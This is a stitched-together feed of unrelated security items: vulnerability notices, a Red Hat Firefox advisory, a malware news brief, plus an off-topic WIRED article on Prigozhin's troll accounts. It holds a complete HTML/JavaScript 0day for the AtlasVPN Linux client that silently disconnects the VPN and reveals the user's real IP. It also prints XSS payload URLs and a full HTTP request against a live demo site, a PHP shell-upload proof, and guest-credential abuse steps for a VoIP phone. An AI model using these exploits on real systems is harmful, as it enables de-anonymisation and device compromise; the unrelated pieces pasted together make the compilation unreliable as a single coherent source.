An issue in China Mobile Communications China Mobile Intelligent Home Gateway v.HG6543C4 allows a remote attacker to execute arbitrary code via the authentication mechanism.

Command Execution Vulnerability in China Mobile Intelligent Home Gateway HG6543C4 Device default information: Equipment model: HG6543C4 Default wireless network name: CMCC-hXtx Default wireless network password: f6qgriu4 Default terminal configuration address: 192.168.1.1 Default terminal configuration account: dr7u2tvn

Vulnerability Description: Under normal circumstances, using the web page function in the device requires logging in to use it; But there is an authentication flaw. If there is already a user logged in (with a different IP address) in the same network, other users in the same network can directly access web resources without the need for authentication Vulnerability analysis: This may be because this system has a session management mechanism for recording logged in users and devices. After someone logs in, the system will store a session ID on the device to identify the user's identity. When accessing this page, the system will check if there is a session ID on the device. If so, it will be accessed directly. If not, it will redirect to the login page. This can improve the user experience by avoiding the need to enter a username and password every time you access; But there are significant safety hazards Demo: For example, if I access web resources that require authentication in both the host and virtual machine environments, and access them in any browser without a login account, I will directly jump to the login page. However, if I only need to log in to the web in one location; It can be accessed directly from the virtual machine. Resources to http://192.168.1.1/html/firewall.html For example, this resource is a switch that controls the firewall

中国移动智能家庭网关HG6543C4存在命令执行漏洞 设备默认信息: 设备型号:HG6543C4 默认无线网络名称:CMCC-hXtx 默认无线网络密码:f6qgriu4 默认终端配置地址:192.168.1.1 默认终端配置账号:dr7u2tvn

漏洞说明: 在正常情况下,使用设备中的web页面功能需要登录使用;但存在身份验证缺陷,如果当前在同一网络中已经有一处用户登录(不同的ip地址),那么在同一个网络内其他用户可直接访问web资源,无需进行身份验证

漏洞分析: 这可能是因为这个系统有一个会话管理的机制，用于记录登录的用户和设备。当有人登录后，系统会在设备上存储一个会话ID，用于标识用户的身份。当访问这个页面时，系统会检查设备上是否有会话ID，如果有，那么就直接访问，如果没有，那么就跳转到登录页面。这样可以虽然避免每次访问都要输入用户名和密码，提高用户的体验;但是存在极大的安全隐患

演示: 例如我使用宿主机和虚拟机两个环境,访问需要身份验证的web资源,在任意一处没有登录账号的浏览器中访问,会直接跳转到登录页面,但是如果只要在一处登录web;即可在虚拟机中直接访问。 资源以http://192.168.1.1/html/firewall.html为例,该资源为控制防火墙的开关

CVE-2023-41012: Command Execution Vulnerability in China Mobile Intelligent Home Gateway HG6543C4 Identity verification has design flaws

Posts praising the Wagner Group boss following his death in a mysterious plane crash last month indicate he was still in control of his "troll farm," researchers claim.

Yveneny Prigozhin’s wartime atrocities propelled the brutal mercenary into the limelight. But Prigozhin—who was once Russian president Vladimir Putin’s chef and a small-time criminal—also held a title as one of the world’s biggest disinformation peddlers. For years, Prigozhin operated the notorious Internet Research Agency, a Russian troll farm that meddled in US elections and beyond.

When Prigozhin suddenly died in a mysterious plane crash on August 23, around two months after he led his Wagner Group mercenaries in a failed mutiny against Putin, the trolls didn’t stop posting. Instead, according to a new analysis shared with WIRED, some continued to show their support for him.

In the days immediately after his death, a coordinated network of pro-Prigozhin accounts on X (formerly known as Twitter) pushed messages saying that the warlord was a hero and good for Russia, despite the Wagner Group’s failed rebellion against Putin in June. These messages also blamed the West for the plane crash and said that the Wagner Group would continue operating in Africa.

“It was not profitable for Putin to kill Prigozhin. PMC \[private military company\] carry a lot of weight in Africa, and Prigozhin skillfully managed it, despite his ‘character quirks,’” one account posted on X. “Prigozhin served for the good of Russia, remained faithful to his military oath, and was killed by saboteurs, or terrorists mined the plane,” another speculated. “In short, he just ditched his phone and disappeared into the sunset, just like in a typical action movie,” a third posted.

The organized accounts were all identified and shared with WIRED by Antibot4Navalny, an anonymous group of volunteers who track Russian-language influence operations on X. A person behind the group, whom WIRED granted anonymity due to safety concerns, says they started inspecting the posts of suspected X accounts after the crash when they “noticed that Prigozhin is surprisingly covered in an exclusively positive light.” The group found 30 accounts pushing pro-Prigozhin narratives, they say.

The activity could be a sign that Prigozhin remained in control of the Internet Research Agency troll factory until he died, the group claims, adding that it echoes similar activity they previously saw. Reports have said that after the attempted June uprising, Prigozhin-owned news websites and the troll factory were being shut down or looking for new owners. “Domestically, there was a lot of debate whether or not Prigozhin lost his control over the troll factory as one of the immediate aftermaths of the mutiny,” the Antibot4Navalny member says.

While the posts on X are only a tiny snapshot of social media activity, they highlight how Russian-linked propaganda has changed since the Internet Research Agency interfered in US politics in 2016, experts say. The Russian misinformation and disinformation industry has evolved into a rich ecosystem of state-backed media, massive Telegram channels, and more conventional social media posts. Millions of people follow so-called military bloggers and war journalists on Telegram—some of these channels are linked to the Russian state, while others are aligned with Pirgozhin and the Wagner Group. But all can muddy the waters or repeat set lines.

“Confusion in the information space is one of the aims of the Kremlin information operations—to make everything equally unbelievable so people’s trust in all kinds of sources is undermined,” says Eto Buziashvili, a disinformation and influence operations researcher with a focus on Russia at the Atlantic Council’s Digital Forensic Research Lab. Since the start of its full-scale war in Ukraine in February 2022, Russia has blocked and censored social media websites, banned independent news media, and pushed reams of disinformation.

Kyle Walter, head of research at misinformation and disinformation research company Logically, reviewed the posts shared by Antibot4Navalny and says they show “signs of being inauthentic.” The X accounts were largely created earlier this year, have low volumes of original posts, and mostly retweet or reply to accounts, and some of them also follow each other, Walter says. The themes the accounts posted about around the plane crash also match what Logically has seen from monitoring Telegram channels linked to the Wagner Group, he says. Walter adds, however, that linking them directly to the Internet Research Agency is harder to do.

The Antibot4Navalny researcher says that based on their previous research, they believe that the pro-Prigozhin trolls operate in similar ways. They “primarily serve” the interests of Putin, but they also push pro-Prigozhin narratives when it doesn’t “hurt” the Russian president, the researcher says. The approach “still worked in the plane-crash episode: Cover Putin as strongly as possible, but also, it is a nice opportunity to praise Prigozhin,” they say. The researcher says they are reporting the accounts to X.

As well as the posts around the plane crash, the Antibot4Navalny group also shared previous research and analysis with WIRED. In one instance, the group reported more than 7,000 suspected accounts to X. We tested dozens of these accounts and found that they have all been removed from the Elon Musk-owned social media company. Antibot4Navalny says the “troll” accounts are often active in groups, pushing the “same set of talking points” and mostly replying to tweets about news related to Russia and Ukraine or pro-Ukrainian channels. X did not immediately respond to WIRED’s request for comment.

On July 14, the Antibot4Navalny researcher says, some of the accounts they have tracked replied to posts discussing comments from Putin, who said that the Wagner Group “does not exist” and that there is no legal basis for the group. The accounts, the researcher says, sent messages saying that Wagner operated legally and referenced Concord, the catering company owned by Prigozhin. The Antibot4Navalny researcher claims that the points were not included in any Kremlin-controlled media and that mentions of the company “served interests of the troll factory/its owner—rather than interests of the Kremlin.”

Buziashvili, the Atlantic Council researcher, says she believes the troll factory is still operating. “Part of them might be still supporting Prigozhin,” she says. “For most of the people who were working there, they would just continue their work regardless of who is their current boss.”

Following the plane crash, Buziashvili says, Russian officials and state media pushed multiple “theories” simultaneously. On one TV show, both the UK and NATO were blamed for the plane crash, she says. Other instances blame Ukraine and claim that Prigozhin was not killed in the crash. Pro-Wagner Telegram channels were also pushing claims that the plane was shot down by Russian aviation, Buziashvili says, and that they wanted “revenge.” Nobody has formally claimed responsibility for the explosion—both Putin and Ukraine have denied involvement.

Despite the changing information ecosystem, the amount of Russian disinformation on social media is colossal. During the first year after it launched the war in Ukraine, Russia’s disinformation reached an audience of “at least” 165 million and generated 16 billion views across Facebook, Instagram, Twitter/X, YouTube, TikTok, and Telegram, according to a European Commission study of Russia-linked activity published last week. Subscribers to pro-Kremlin Telegram channels have “more than tripled” since the start of the war, the report says. “Preliminary analysis suggests that the reach and influence of Kremlin-backed accounts has grown further in the first half of 2023, driven in particular by the dismantling of Twitter’s safety standards.”

“What we typically see these days is narratives formulated on Telegram,” says Logically’s Walter. The company has recently found pro-Russian channels pushing disinformation about Niger’s military coup, and it has also linked a Russian fact-checking website and Telegram account to a presenter on Russia’s “biggest” propaganda TV show. “You have Western influencers who are sympathetic to Russian causes that will translate those narratives and then share them on mainstream platforms. And they circulate more broadly,” he says.

Walter says that over time, and largely because of the war, it has become easier for Russian propaganda and disinformation to attack the West. “From a tactics perspective, there’s a lot less direct involvement that we can attribute from the Russian state itself, and it is more these proxies,” he says. “Russian disinformation efforts are gradually adapting to any sort of Western countering that gets put in place.”

The Strange Afterlife of Wagner’s Yevgeny Prigozhin


Due to an out-of-date dependency in the “Fusion File Manager” component accessible through the admin panel, an attacker can send a crafted request that allows them to read the contents of files on the system accessible within the privileges of the running process. Additionally, they may write files to arbitrary locations, provided the files pass the application’s mime-type and file extension validation. 



Posted by on Tuesday, September 5, 2023

_Synopsys researcher discovers vulnerabilities CVE-2023-2453, CVE-2023-4480 in PHPFusion._  

**Overview **

The Synopsys Cybersecurity Research Center (CyRC) has discovered CVE-2023-2453, an authenticated local file inclusion vulnerability in PHPFusion. PHPFusion is an open-source content management system (CMS) designed for managing personal or commercial websites and is offered under the GNU Affero General Public License v3.0. 

**CVE-2023-2453 **

There is insufficient sanitization of tainted file names that are directly concatenated with a path that is subsequently passed to a ‘require\_once’ statement. This allows arbitrary files with the ‘.php’ extension for which the absolute path is known to be included and executed. There are no known means in PHPFusion through which an attacker can upload and target a ‘.php’ file payload. 

**CVE-2023-4480 **

Due to an out-of-date dependency in the “Fusion File Manager” component accessible through the admin panel, an attacker can send a crafted request that allows them to read the contents of files on the system accessible within the privileges of the running process. Additionally, they may write files to arbitrary locations, provided the files pass the application’s mime-type and file extension validation.  

**Exploitation ****CVE-2023-2453 **

An attacker authenticated with “Member”, “Administrator”, or “Super Administrator” privileges can send a crafted HTTP GET request to an endpoint in the “Forum” Infusion with a vulnerable parameter containing traversal sequences to include and execute arbitrary ‘.php’ files on the underlying operating system. 

**CVE-2023-4480 **

An attacker that can log into the admin panel of the application via either an “Administrator” or “Super Administrator” account can send HTTP requests containing directory traversal payloads to an endpoint within the “Fusion File Manager” component to either disclose the contents of files or write files from a limited subset of types to known absolute paths on the underlying server’s filesystem. 

**Affected software **

*   PHPFusion 9.10.30 and earlier versions. 

**Impact ****CVE-2023-2453 **

Exploitation of this vulnerability can lead to remote code execution (RCE) if an attacker can acquire some means of uploading a crafted payload file with the ‘.php’ extension to any known absolute path on the target system. 

CVSS Base Score: 8.3 (High) 

CVSS 3.1 Vector: CVSS3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C 

**CVE-2023-4480 **

Exploitation of this vulnerability can lead to arbitrary file read and limited file write for known absolute paths on the host. 

CVSS Base Score: 5.2 (Medium) 

CVSS 3.1 Vector: CVSS3.1/ AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:P/RL:U/RC:C 

**Remediation ****CVE-2023-2453 **

There is no patch available for this vulnerability. Disabling the “Forum” Infusion through the admin panel removes the endpoint through which this vulnerability is exploited, and so prevents the issue. If the “Forum” Infusion cannot be disabled, technologies such as a web application firewall may help to mitigate exploitation attempts. 

**CVE-2023-4480 **

There is no patch available for this vulnerability. Technologies such as a web application firewall may help to mitigate exploitation attempts. 

**Discovery credit ****CVE-2023-2453 **

This vulnerability was discovered by CyRC researcher Matthew Hogg. 

**CVE-2023-4480 **

This vulnerability was discovered by CyRC researcher Dharani Sri Penumacha. 

**Timeline  **

2023-06-05 – Attempted to disclose issue to vendor via email. 

2023-06-13 – Attempted to follow up on initial disclosure communication 

2023-06-26 – Attempted to contact via Github. 

2023-08-01 – Attempted to contact via community forum. 

2023-09-05 – Public disclosure. 

**References **

https://github.com/PHPFusion/PHPFusion 

https://www.phpfusion.com/home.php 

**About CVSS  **

FIRST.Org, Inc (FIRST) is a non-profit organization based out of US that owns and manages CVSS. It is not required to be a member of FIRST to utilize or implement CVSS but FIRST does require any individual or organization give appropriate attribution while using CVSS. FIRST also states that any individual or organization that publishes scores follow the guideline so that anyone can understand how the score was calculated.

CVE-2023-4480: CyRC Vulnerability Advisory: CVE-2023-2453 Local File Inclusion in Forum Infusion and CVE-2023-4480 Arbitrary File Read in Fusion File Manager

Internet Radio auna IR-160 SE using the UIProto firmware suffers from missing authentication, cross site scripting, and denial of service vulnerabilities.

    The internet radio device auna IR-160 SE has multiple vulnerabilities. It uses the firmware UIProto, different versions of which can also be found in many other radios.1. The firmware offers a rudimentary web API that can be reached on the local network on port 80. This API is completely unauthenticated, allowing anyone to control the radio over the local network. (already known as CVE-2019-13474, but relevant for the other two findings) [1] [2] [3]2. The web UI does not encode user input, resulting in a XSS vulnerability, e.g. when changing the device name as follows:http://192.168.178.93/set_dname?name=><script>alert(1)</script>3. The firmware crashes when sending a device name longer than 84 characters. Some parts of the firmware will recover afterwards and music will play again after a few seconds, but the service on port 80 remains borked until the radio is reset using the switch on the back. This may or may not be a memory corruption vulnerability. I don't feel like analyzing this any further, but it certainly looks kinda fucked..../set_dname?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaFor other vulnerabilities in UIProto see CVE-2019-13473 and CVE-2019-13474 discovered by Benjamin K.M. These reports also mention other devices that are possibly affected by this as well.Also, if anyone knows how to re-enable telnetd on the patched version of UIProto, please let me know!Love,naphthalin[1] https://github.com/kayrus/iradio[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio[3] https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

Internet Radio auna IR-160 SE UIProto DoS / XSS / Missing Authentication

Remote disconnect exploit for AtlasVPN Linux client version 1.0.3 that will allow a remote website to extract a client's real IP address.

    The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.Root CauseThe AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.Exploit CodeThe following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.    <html>     <head>      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>    </head>     <body>      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=     You should be running the atlasvpn linux client and be connected to a VPN.    Use <b>atlasvpn connect</b> to connect to a VPN server.     </code></pre>       <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">        <button type="submit" style="display: none"></button>      </form>       <script>        window._currentIP = false;         // Run main exploit code        window.addEventListener('load', function () {          addIPToLog();          setTimeout(triggerFormSubmission, 1000);          setTimeout(addIPToLog, 3000);        });         // Blind CORS request to atlasvpnd to disconnect the VPN        function triggerFormSubmission() {          var logDiv = document.getElementById('log');          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";          document.getElementById('stopForm').submit();        }         // Gets IP from ipfy API (this, of course, could be your server)        function addIPToLog() {          var logDiv = document.getElementById('log');          var xhr = new XMLHttpRequest();           xhr.open('GET', 'https://api.ipify.org?format=json', true);           xhr.onload = function () {            var ipAddress = window._currentIP;            if (xhr.status === 200) {              var response = JSON.parse(xhr.responseText);              ipAddress = response.ip;               logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";            } else {              logDiv.innerHTML += '[-] Error fetching IP address.\n';            }             // Check if the IP changed. If yes: Success.            if (window._currentIP && window._currentIP != ipAddress) {              logDiv.innerHTML += "[+] Successfully disconnected VPN."            }            if (window._currentIP && window._currentIP == ipAddress) {              logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."            }             // Save IP for next iteration.            window._currentIP = ipAddress;          };           xhr.send();        }      </script>    </body>    </html>    GreetsFly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.

AtlasVPN Linux Client 1.0.3 IP Leak

WEBIGniter version 28.7.23 suffers from a remote shell upload vulnerability.

    ## Title: WEBIGniter-28.7.23 File Upload - RCE## Author: nu11secur1ty## Date: 09/04/2023## Vendor: https://webigniter.net/## Software: https://webigniter.net/demo## Reference: https://portswigger.net/web-security/file-upload## Description:The media function suffers from file upload vulnerability.The attacker can upload and he can execute remotely very dangerous PHPfiles, by using any created account before this on this system.Then he can do very malicious stuff with the server of this application.## Staus: HIGH-CRITICAL Vulnerability[+]Simple Exploit:```PHP<?php  phpinfo();?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)## Time spent:00:15:00

WEBIGniter 28.7.23 Shell Upload

WEBIGniter version 28.7.23 suffers from a cross site scripting vulnerability.

    ## Title: WEBIGniter-28.7.23-XSS-Reflected## Author: nu11secur1ty## Date: 09/04/2023## Vendor: https://webigniter.net/## Software: https://webigniter.net/demo## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the redirect request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks. The payload ycsz3"><script>alert(1)</script>bn76w was submittedin the redirect parameter. This input was echoed unmodified in theapplication's response.By using this Java Script injection, the attacker can trick a lot ofusers into visiting his dangerous URL which is reflected on the loginform, before they log in, warning them that there is a problem withthe login, which is very nasty and DANGEROUS!## Staus: HIGH Vulnerability[+]Paylod:```GETGET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76wHTTP/1.1Host: demo.webigniter.netAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-xss-reflected.html)## Time spent:01:35:00

WEBIGniter 28.7.23 Cross Site Scripting

Red Hat Security Advisory 2023-4950-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:4950-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4950  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.15.0-1.el9_0.src.rpm

aarch64:  
firefox-102.15.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.15.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.15.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.15.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.15.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.15.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.15.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.15.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.15.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9is7AAoJENzjgjWX9erE68EP/Rjo8UtnwJRWUHf1yfaP8SQM  
TgypPyYgm5aIQDKWR0QRAlvOHg2kJl1IEffnDRGJIXdQy+2/AXLAGHt7mHjbKcdG  
KfsLo302w663wtlbh2nGz4+CyWHGvMMni7Z0nYCscoaacV7U7Lu2rysISNjOMCQe  
mmVJampdsmbZ7L6KLocPIAVaSOakZGkaWGRPfSZj7zIinEYREe+jzi7I92uOQZNf  
0i2hH1b76k4IJhxCej9z7JNdRgP+fx2wjF0JjmNZUK6vbieqLVR1wDCtnLFTVpyH  
PwGYbmsL6Dq+y8lIB+tbrvbC9CZ5vCUAkoeWxe/PmCITyGoWdkEGyclawZN4PRto  
aLtUhgpHfmME7jhzloPTUxhn8ccv0249pcPVDL+XqkXEFcg2dGj5NUlTjUWOh/yp  
noJabo3eziF3GDh9L8FeQF+BL1OT5oxrlFragRY2Dc1uvELQo9qEc7hwbIvA6TkL  
3n6gaJrc/y5NII3eucM7WSZUWaFBS0JyE+6QbFYrNMfDgouL8lJC1RgkFGA0rJ2r  
xR+y2IUp2VfVeoWXTle4UrDIQDkIWjRfa81nfyEYfG4WDgvt+ssVXSZ2AOdm5Vih  
b1gD8txdVs4Ao24U7sggxO77Haar1A5jUQnKhiDHMVhMjzjoBiBAXQ6Bw+zGDz6i  
c9py38wStJ68SWaCREj3  
=fC7+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4950-01

DLINK DPH-400SE version FRU2.2.15.8 suffers from an information disclosure vulnerability.

    # Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information# Date : 25-08-2023# Exploit Author : tahaafarooq# Vendor Homepage : https://dlink.com/# Version : FRU2.2.15.8# Tested on: DLINK DPH-400SE (VoIP Phone)Description:With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200POC :1. Login with the default guest credentials "guest:guest"2. Access the Maintenance tab.3. Under the maintenance tab, access the "Access" feature4. On "Account Option" choose a user to modify, thus "Admin" and click modify.5. Right click on the password, and click reveal, the password is then seen in plaintext.

DLINK DPH-400SE FRU2.2.15.8 Information Disclosure

An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic.
“New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments,” Elastic Security Labs researchers Salim Bitam and Daniel

An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic.

"New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments," Elastic Security Labs researchers Salim Bitam and Daniel Stepanic said in a technical report published late last month.

BLISTER was first uncovered by the company in December 2021 acting as a conduit to distribute Cobalt Strike and BitRAT payloads on compromised systems.

The use of the malware alongside SocGholish (aka FakeUpdates), a JavaScript-based downloader malware, to deliver Mythic was previously disclosed by Palo Alto Networks Unit 42 in July 2023.

In these attacks, BLISTER is embedded within a legitimate VLC Media Player library in an attempt to get around security software and infiltrate victim environments.

UPCOMING WEBINAR

Detect, Respond, Protect: ITDR and SSPM for Complete SaaS Security

Discover how Identity Threat Detection & Response (ITDR) identifies and mitigates threats with the help of SSPM. Learn how to secure your corporate SaaS applications and protect your data, even after a breach.

Supercharge Your Skills

Both SocGholish and BLISTER have been used in tandem as part of several campaigns, with the latter used as a second-stage loader to distribute Cobalt Strike and LockBit ransomware, as evidenced by Red Canary and Trend Micro in early 2022.

A closer analysis of the malware shows that it's being actively maintained, with the malware authors incorporating a slew of techniques to fly under the radar and complicate analysis.

"BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode," Elastic noted in April 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web